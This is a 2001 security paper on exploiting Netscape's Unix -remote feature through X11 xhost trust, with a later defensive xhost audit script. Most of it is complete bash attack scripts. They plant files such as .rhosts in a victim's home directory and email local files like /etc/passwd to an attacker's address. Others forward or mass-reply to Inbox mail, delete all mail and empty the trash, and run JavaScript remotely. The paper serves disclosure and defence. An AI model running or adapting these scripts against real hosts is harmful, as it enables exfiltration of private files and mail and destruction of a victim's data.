Exploiting Trust with the Netscape -remote Feature

Gurney Halleck
6/19/01

Summary:

Netscape under Unix provides a remote control feature that can be exploited by an attacker from a trusted host. This paper explores the feature, provides examples and discusses the implications.

Main:

The -remote feature has been part of Netscape since version 1.1 and is planned for inclusion in Mozilla. While obscure, it is documented at http://home.netscape.com/newsref/std/x-remote.html, and its use by an attacker has been discussed on BugTraq (Message IDs: 199605311304.PAA25201@imhotep.cst.cnes.fr, 9605270435.AA16507@java.sg.fp.cibcwg.com and others). While the potential for exploitation through X Windows trust (via xhost) is relatively well known, this feature adds an extra dimension to the issue.

The -remote feature allows certain commands to be passed to an existing instance of Netscape from either the local host or a remote host that has been given access to the display via the xhost command:

    netscape -display remotehost:0.0 -remote "<command>"

Commands listed in the Netscape documentation include:

    openURL()  - Opens a specified URL
    openFile() - Opens a specified file
    saveAs()   - Saves a file
    mailto()   - Composes an email message

Glossed over in the documentation is that calls to the Netscape API, some of which are listed in the Netscape.ad file (located in the Netscape installation directory), can also be made through the -remote feature. One of the most interesting is xfeDoCommand().
Arguments can include:

    selectAll       - select all of the current text
    copy            - copy selected text
    paste           - paste copied text
    previousMessage - move to previous message
    nextMessage     - move to next message
    openSelected    - open selected message
    sendMessageNow  - send composed message
    replyToAll      - reply to all
    deleteMessage   - delete selected message
    emptyTrash      - empty Trash
    exit            - exit the browser

Almost anything that can be bound to a shortcut key, as demonstrated in the Netscape.ad file, can be called remotely.

Demonstration Scripts:

The following are shell scripts, with discussion, that demonstrate the exploitation of these features. All of them assume the victim has xhost +'ed the attacking host and has Netscape running on the given display.

nsKill:

This script uses a call to xfeDoCommand(exit) to simply cause the remote browser to exit. While annoying, it does not pose much of a threat.

%< -- BEGIN nsKill --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# Summary:
#
# nsKill: Demonstration script for exploiting the Unix Netscape
# -remote feature. Kill Netscape remotely
#
# Description:
#
# This script will send the exit command to a remote Netscape.
# The victim must be xhost +'ed to the attacking host and
# have Netscape running.
#
# Usage:
#   nsKill <display>
#
#   <display> = display of the remote machine (somehost:0.0)
#
# Ex. nsKill remotehost:0.0
#

## Show usage
if [ $# -lt 1 ]
then
    echo "Usage:"
    echo "  nsKill <display>"
    exit 1
fi

## Exit Netscape
netscape -display "$1" -remote "xfeDoCommand(exit)"
%< -- END nsKill --

nsSaveFile:

This script opens a specified URL and then saves the file into the user's local directory under the provided name. It could be used to create a .rhosts file or deliver a trojan shell script (especially if the user has '.' in their path). If a file of that name already exists on the local machine a confirmation box will appear, requiring the user to take an action, but if no such file exists the page is saved without assistance. The script covers its tracks by sending a "back" command to the browser so that the previous page is displayed to the user.

%< -- BEGIN nsSaveFile --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# Summary:
#
# nsSaveFile: Demonstration script for exploiting the Unix Netscape
# -remote feature. It opens a URL and saves it to the user's directory.
#
# Description:
#
# This script will open a specified URL and save it as a text file in the
# victim's directory. This could be used, for example, to create a .rhosts
# file in the victim's home directory. The victim must be xhost +'ed to
# the attacking host and have Netscape running.
#
# Usage:
#   nsSaveFile <display> <URL> <filename>
#
#   <display>  = display of the remote machine (somehost:0.0)
#   <URL>      = the URL to open
#   <filename> = file name to save as
#
# Ex. nsSaveFile remotehost:0.0 http://web.server/rhosts.txt .rhosts
#

## Show usage
if [ $# -lt 3 ]
then
    echo "Usage:"
    echo "  nsSaveFile <display> <URL> <filename>"
    exit 1
fi

## Open the URL
netscape -display "$1" -remote "openURL($2)"

## Save as text (no prompt unless a file of that name already exists)
netscape -display "$1" -remote "SaveAs($3,text)"

## Clean up by going back a page
netscape -display "$1" -remote "xfeDoCommand(back)"
%< -- END nsSaveFile --

nsSendFile:

This script begins to show how the browser can be manipulated remotely. It opens a specified URL, which could be a local file, and then emails it to a provided address. The browser is directed to open the URL; then, using the selectAll and copy commands, the contents of the page are copied. A mailto: URL is provided including an email address and subject line. By providing a subject line the cursor is positioned in the message body. The previously copied text is pasted into the body of the message, and the sendMessageNow command is used to send it immediately. No user action is required, since an address, subject line and body have all been provided.

%< -- BEGIN nsSendFile --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# Summary:
#
# nsSendFile: Demonstration script for exploiting the Unix Netscape
# -remote feature. Open a URL and send it to a specified email address.
#
# Description:
#
# This script will open a specified URL, which could be a local file, and
# send it to a specified email address. The victim must be xhost +'ed to
# the attacking host and have Netscape running.
#
# Usage:
#   nsSendFile <display> <URL> <address>
#
#   <display> = display of the remote machine (somehost:0.0)
#   <URL>     = URL to open (could be a local file)
#   <address> = email address to send the URL to
#
# Ex. nsSendFile remotehost:0.0 file://localhost/etc/passwd me@my.address
#

## Show usage
if [ $# -lt 3 ]
then
    echo "Usage:"
    echo "  nsSendFile <display> <URL> <address>"
    exit 1
fi

## Open URL
netscape -display "$1" -remote "openURL($2)"

## Select contents
netscape -display "$1" -remote 'xfeDoCommand(selectAll)'

## Copy selected
netscape -display "$1" -remote 'xfeDoCommand(copy)'

## Compose new message; the subject line leaves the cursor in the body
netscape -display "$1" -remote "openURL(mailto:$3?subject=For your Review)"

## Paste contents
netscape -display "$1" -remote 'xfeDoCommand(paste)'

## Send message
netscape -display "$1" -remote 'xfeDoCommand(sendMessageNow)'

## Wait for message to be sent
sleep 10

## Clean up
netscape -display "$1" -remote 'xfeDoCommand(back)'
%< -- END nsSendFile --

nsSendInbox:

Using some of the previous tricks, this script walks the user's Inbox, sending each message to the specified address. Netscape is directed to open the Inbox and expand the message threads. Since we don't know which message is currently selected (we could be at the bottom of the list) we back up by the number of messages we want to capture. The script then moves down the Inbox opening and copying each message, then composing, pasting and sending a new message to the specified email address.

%< -- BEGIN nsSendInbox --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# Summary:
#
# nsSendInbox: Demonstration script for exploiting the Unix Netscape
# -remote feature. Send Inbox messages.
#
# Description:
#
# This script will send messages from the victim's Inbox to a
# specified mail address. The victim must be xhost +'ed to
# the attacking host and have Netscape running.
#
# Usage:
#   nsSendInbox <display> <address> <# of messages>
#
#   <display>       = display of the remote machine (somehost:0.0)
#   <address>       = email address to send messages to
#   <# of messages> = number of messages to send
#
# Ex. nsSendInbox remotehost:0.0 me@my.address 5
#

## Show usage
if [ $# -lt 3 ]
then
    echo "Usage:"
    echo "  nsSendInbox <display> <address> <# of messages>"
    exit 1
fi

## Open messenger Inbox
netscape -display "$1" -remote "xfeDoCommand(openInbox)"

## Expand all threads so we don't skip over messages
netscape -display "$1" -remote "xfeDoCommand(expandAll)"

## Move back just in case we are at the bottom of the message list
count=0
while [ $count -lt $3 ]
do
    netscape -display "$1" -remote "xfeDoCommand(previousMessage)"
    let count=$count+1
done

## Open the message currently selected/highlighted
netscape -display "$1" -remote "xfeDoCommand(openSelected)"

## Loop over messages sending each one
count=0
while [ $count -lt $3 ]
do
    ## Select all the text of the opened message
    netscape -display "$1" -remote 'xfeDoCommand(selectAll)'

    ## Copy selected text
    netscape -display "$1" -remote 'xfeDoCommand(copy)'

    ## Compose a new message using the specified email address
    ## Specifying a subject line places the cursor in the body
    netscape -display "$1" -remote "openURL(mailto:$2?subject=For your Review)"

    ## Paste previously selected text
    netscape -display "$1" -remote 'xfeDoCommand(paste)'

    ## Send the message
    netscape -display "$1" -remote 'xfeDoCommand(sendMessageNow)'

    ## Sleep a bit so that the message can be sent
    sleep 10

    ## Select the next message
    netscape -display "$1" -remote "xfeDoCommand(nextMessage)"

    let count=$count+1
    ## do it all again
done

## clean up by closing the message window
netscape -display "$1" -remote "xfeDoCommand(close)"
%< -- END nsSendInbox --

nsReplyAll:

This script opens and copies the contents of a URL. Then, like nsSendInbox, it walks the user's Inbox. This time it does a Reply To All on each message and pastes in the contents of the specified URL.

%< -- BEGIN nsReplyAll --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# Summary:
#
# nsReplyAll: Demonstration script for exploiting the Unix Netscape
# -remote feature. Make custom replies to Inbox messages
#
# Description:
#
# This script will open a URL, copy the contents of the page,
# then reply to Inbox messages, appending the contents to
# each reply.
# The victim must be xhost +'ed to the attacking host and have
# Netscape running.
#
# Usage:
#   nsReplyAll <display> <URL> <# of messages>
#
#   <display>       = display of the remote machine (somehost:0.0)
#   <URL>           = contents to attach to each reply
#   <# of messages> = number of messages to reply to
#
# Ex. nsReplyAll remotehost:0.0 http://web.server/insult.txt 5
#

## Show usage
if [ $# -lt 3 ]
then
    echo "Usage:"
    echo "  nsReplyAll <display> <URL> <# of messages>"
    exit 1
fi

## Open URL
netscape -display "$1" -raise -remote "openURL($2)"

## wait for the page to come up
sleep 5

## Select the text
netscape -display "$1" -remote "xfeDoCommand(selectAll)"

## Copy the text
netscape -display "$1" -remote "xfeDoCommand(copy)"

## Back up
netscape -display "$1" -remote "xfeDoCommand(back)"

## Open messenger Inbox
netscape -display "$1" -raise -remote "xfeDoCommand(openInbox)"

## Expand all threads so we don't skip over messages
netscape -display "$1" -remote "xfeDoCommand(expandAll)"

## Move back just in case we are at the bottom of the message list
count=0
while [ $count -lt $3 ]
do
    netscape -display "$1" -remote "xfeDoCommand(previousMessage)"
    let count=$count+1
done

## Loop over messages replying to each one
count=0
while [ $count -lt $3 ]
do
    ## ReplyToAll to current message
    netscape -display "$1" -remote "xfeDoCommand(replyToAll)"

    ## Paste in our special comments
    netscape -display "$1" -remote "xfeDoCommand(paste)"

    ## Send the message
    netscape -display "$1" -remote 'xfeDoCommand(sendMessageNow)'

    ## Sleep a bit so that the message can be sent
    sleep 10

    ## Select the next message
    netscape -display "$1" -remote "xfeDoCommand(nextMessage)"

    let count=$count+1
    ## do it all again
done

## clean up by closing the message window
netscape -display "$1" -remote "xfeDoCommand(close)"
%< -- END nsReplyAll --

nsDelInbox:

This time we walk the user's Inbox deleting each message and then finish by emptying the trash (permanently deleting the messages).

%< -- BEGIN nsDelInbox --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# Summary:
#
# nsDelInbox: Demonstration script for exploiting the Unix Netscape
# -remote feature. Delete messages in the Inbox
#
# Description:
#
# This script will delete messages from the victim's Inbox.
# The victim must be xhost +'ed to the attacking host
# and have Netscape running.
#
# Usage:
#   nsDelInbox <display> <# of messages>
#
#   <display>       = display of the remote machine (somehost:0.0)
#   <# of messages> = number of messages to delete
#
# Ex. nsDelInbox remotehost:0.0 5
#

## Show usage
if [ $# -lt 2 ]
then
    echo "Usage:"
    echo "  nsDelInbox <display> <# of messages to delete>"
    exit 1
fi

## Open messenger Inbox
netscape -display "$1" -remote "xfeDoCommand(openInbox)"

## Expand all threads so we don't skip over messages
netscape -display "$1" -remote "xfeDoCommand(expandAll)"

## Move back just in case we are at the bottom of the message list
count=0
while [ $count -lt $2 ]
do
    netscape -display "$1" -remote "xfeDoCommand(previousMessage)"
    let count=$count+1
done

## Loop over messages deleting each one
count=0
while [ $count -lt $2 ]
do
    ## Delete the current message (selection moves to the next one)
    netscape -display "$1" -remote 'xfeDoCommand(deleteMessage)'
    let count=$count+1
    ## do it all again
done

## Empty the trash - bye, bye
netscape -display "$1" -remote 'xfeDoCommand(emptyTrash)'
%< -- END nsDelInbox --

JavaScript/Java:

Another avenue of exploration is the remote execution of JavaScript (as shown below) and the forced execution of Java applets. The nsJSTest script is a demonstration of remote JavaScript execution via a javascript: URL passed to openURL().

%< -- BEGIN nsJSTest --
#! /bin/bash
#
# Gurney Halleck
# 6/18/2001
#
# nsJSTest: Demonstration script for exploiting the Unix Netscape
# -remote feature. Execute JavaScript on a remote host.
# The victim must be xhost +'ed to the attacking host
# and have Netscape running.
#
# Usage:
#   nsJSTest <display>
#
#   <display> = display of the remote machine (somehost:0.0)
#

## Show usage
if [ $# -lt 1 ]
then
    echo "Usage:"
    echo "  nsJSTest <display>"
    exit 1
fi

## The whole javascript: URL is one argument to openURL(); the
## backslashes continue the shell string across lines.
netscape -display "$1" -remote "openURL(\
javascript:\
if (confirm(\"Your browser is insecure\") ) {\
   location=\"http://www.blackknife.com/\"; }\
else {\
   alert(\"I wouldn't be so sure\");})"
%< -- END nsJSTest --

Script Discussion:

None of the scripts are very stealthy in their actions. Sent messages will be in the Sent mail folder (if that feature is selected), unread messages will be marked read, windows will be raised, URLs will be added to the browser history and other indications will be present. As the scripts run, all activity is visible, so to be successful the user would have to be away from the workstation.

The -remote feature acts on the first instance of Netscape that it can find. If multiple instances exist, a specific window ID can be passed with the -id parameter. None of these scripts include that capability, but it could easily be added so that specific Netscape instances and windows are targeted.

The scripts are not in any way intelligent. Multiple instances of Netscape, timing issues and various other factors may cause them to hang. In testing, each of these scripts was successful with various versions of Netscape on a number of Unix-like OS's.

Associative Trust:

While testing the scripts, the issue of associative trust was re-emphasized. Some of the tests included the configuration where a user on Host B had xhost +'ed both Host A and Host C, as shown below:

                      +------+
                      | Host |  <-- Victim
                      |  B   |
                      +------+
                      /      \
              Trust  /        \  Trust
                    /          \
              +------+        +------+
  Attacker -> | Host |        | Host |
              |  A   |========|  C   |
              +------+    ^   +------+
                          |
             Associative Trust Relationship

The attacker was positioned on Host A and was successful in manipulating an instance of Netscape running on Host C with its display forwarded to Host B.
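Every script above, and the Host A to Host C chain just described, depends on what the victim's display reports when `xhost` is run with no arguments. The following is an added example, not part of the original paper: a small POSIX sh audit that reads that xhost output, classifies the display as wide open (xhost +), trusting specific hosts (xhost +somehost), or closed to host-based access, and prints the xhost commands that would revoke the trust. The sample outputs are constructed in the format xhost prints; the host names are made up. Against a live display, call xhost_remediation "$(xhost)".

```shell
#!/bin/sh
# Added example (not from the original paper): audit the host-based trust an
# X display grants via xhost.  The functions take xhost's output as text so
# they can be exercised offline against constructed samples.

# Classify xhost output.  Prints one of:
#   open      - "access control disabled" (xhost +): any host can connect,
#               and any host can drive Netscape with -remote
#   hosttrust - access control is on, but specific hosts are listed
#               (xhost +somehost); those hosts can drive Netscape
#   closed    - no host entries; only cookie-authenticated or local clients
xhost_verdict() {
    out=$1
    if printf '%s\n' "$out" | grep -qi 'access control disabled'; then
        echo open
    elif printf '%s\n' "$out" | grep -q '^INET6\{0,1\}:'; then
        echo hosttrust
    else
        echo closed
    fi
}

# Print the trusted hosts, one per line, with the INET:/INET6: family prefix
# that xhost uses stripped, so they can be revoked with "xhost -<host>".
xhost_trusted_hosts() {
    printf '%s\n' "$1" | sed -n 's/^INET6\{0,1\}:\(.*\)$/\1/p'
}

# Emit the xhost command(s) that close the hole for the given policy.
# "xhost -" re-enables access control; "xhost -host" drops one entry.
xhost_remediation() {
    case $(xhost_verdict "$1") in
        open)      echo 'xhost -' ;;
        hosttrust) xhost_trusted_hosts "$1" | sed 's/^/xhost -/' ;;
        closed)    echo 'nothing to do' ;;
    esac
}

# Constructed samples in the format xhost prints.  The first line of each is
# xhost's own wording; the host names are invented for the example.
SAMPLE_OPEN='access control disabled, clients can connect from any host
SI:localuser:victim'
SAMPLE_TRUST='access control enabled, only authorized clients can connect
INET:hosta.example.net
INET:hostc.example.net
SI:localuser:victim'
SAMPLE_CLOSED='access control enabled, only authorized clients can connect
SI:localuser:victim'

# Example run over the constructed "Host B trusts A and C" policy:
#   xhost_verdict "$SAMPLE_TRUST"      -> hosttrust
#   xhost_remediation "$SAMPLE_TRUST"  -> xhost -hosta.example.net
#                                         xhost -hostc.example.net
```

The "closed" verdict only means no host-based entries exist; clients that hold the MIT-MAGIC-COOKIE in the user's Xauthority file (the normal case for ssh X forwarding) still connect, which is the protection the Conclusions section refers to. Any INET entry, on the other hand, is exactly the trust the scripts above need.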
An associative trust relationship is created by the user on Host B which allows the attacker to view or manipulate files on Host C, a machine that never trusted Host A directly.

Conclusions:

Security issues relating to X Windows trust relationships are well known and documented. The Netscape -remote feature only provides a new twist on an existing vulnerability. Almost everything that can be done using this feature could be accomplished by a knowledgeable X Windows programmer; -remote just makes the end goal that much easier to reach by providing a simple interface.

Emphasis needs to be placed on trust relationships and their associative properties. An X Windows user can create a trust relationship between two systems that would not normally trust each other. Some examples beyond the simple xhost +'ed scenario include:

    An instance of Netscape tunneled through ssh from one machine could be
    manipulated by an attacker on another, xhost +'ed machine.

    An attacker could open a session via SSL or VPN to a protected host
    using the victim's credentials and capture or manipulate files on that
    protected host.

Users and administrators need to understand these issues and make informed decisions about the trust relationships they create. Ssh can provide protection if Xauthority is enabled (usually the default) and there are no xhost +'ed hosts. Ideally, all connections would be tunneled through ssh, but often this is not possible due to various real-world issues.

It appears that the Mozilla team is planning to incorporate the -remote feature into Mozilla (http://www.mozilla.org/unix/remote.html). It is not known if there is any real-world use of the -remote feature beyond the openURL() command. It would seem advisable to limit the capabilities of this feature in future releases of Mozilla.

Further Investigation:

The execution of JavaScript was not investigated beyond the simple example.
Injection of hostile JavaScript or forcing the execution of hostile Java applets could provide other, more complex exploits.

This paper and related information can be found at: http://www.blackknife.com

Disclaimer:

The information provided in this paper is for demonstrative purposes only. The author(s) take no responsibility for the use of or damages caused by the information provided.

Distribution:

This paper may be freely copied or distributed in any form provided the content is unmodified and proper attribution is provided.